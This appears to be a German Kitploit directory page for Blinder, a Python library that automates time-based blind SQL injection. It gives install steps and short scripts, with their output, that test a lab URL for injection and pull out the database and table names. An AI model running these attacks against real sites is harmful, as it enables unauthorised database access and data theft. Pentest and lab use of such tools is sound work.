Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Blinder — Eine Python-Bibliothek zur Automatisierung von zeitbasierter Blind-SQL-Injection | Kitploit
Tools/GitHubGitHub/mhaskar/blinder
SchwachstellenanalyseWebsicherheitPenetrationstestsDatenbanksicherheit
GitHubmhaskar/blinder

Blinder

Eine Python-Bibliothek zur Automatisierung von zeitbasierter Blind-SQL-Injection

Repository anzeigen
5015vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Blinder

Blidner ist eine kleine Python-Bibliothek zur Automatisierung von zeitbasierten Blind-SQL-Injection-Angriffen, indem vordefinierte Abfragen als Funktionen genutzt werden, um eine schnelle PoC-Entwicklung zu ermöglichen.

Installation

Sie können Blinder mit dem folgenden Befehl installieren:

pip install blinder

Oder indem Sie den Quellcode herunterladen und manuell in Ihr Projekt importieren.

Verwendung

Um Blinder zu verwenden, müssen Sie das Blinder-Modul importieren und dann die Hauptfunktionen von Blinder nutzen.

Sie können Blinder (in der aktuellen Version) für folgende Aufgaben verwenden:

  • Überprüfung auf zeitbasierte Injection.
  • Abrufen des Datenbanknamens.
  • Abrufen von Tabellennamen.

Sie können mit dem folgenden Code eine Injection in einer URL überprüfen:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print blind.check_injection()

Die Ausführung ergibt:

root@kitploit:~
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#

Sie können den Datenbanknamen mit folgendem Code abrufen:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

print "Database name is : %s " % blind.get_database()

Und die Ergebnisse sind:

root@kitploit:~
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#

Um Tabellennamen abzurufen, verwenden Sie folgenden Code:

root@kitploit:~
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
    "http://sqli-lab/sql_injection/index.php?search=3",
    sleep=1
 )

tables = blind.get_tables()

for table in tables:
    print table

Und die Ergebnisse sind:

root@kitploit:~
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO

Viele Funktionen sollen bald hinzugefügt werden, wie z.B.:

  • die Möglichkeit, benutzerdefinierte Abfragen hinzuzufügen
  • Testen von Injectionspunkten basierend auf Burp-Anfragen
  • Extrahieren von Tabellen-/Spaltendaten
Tool herunterladen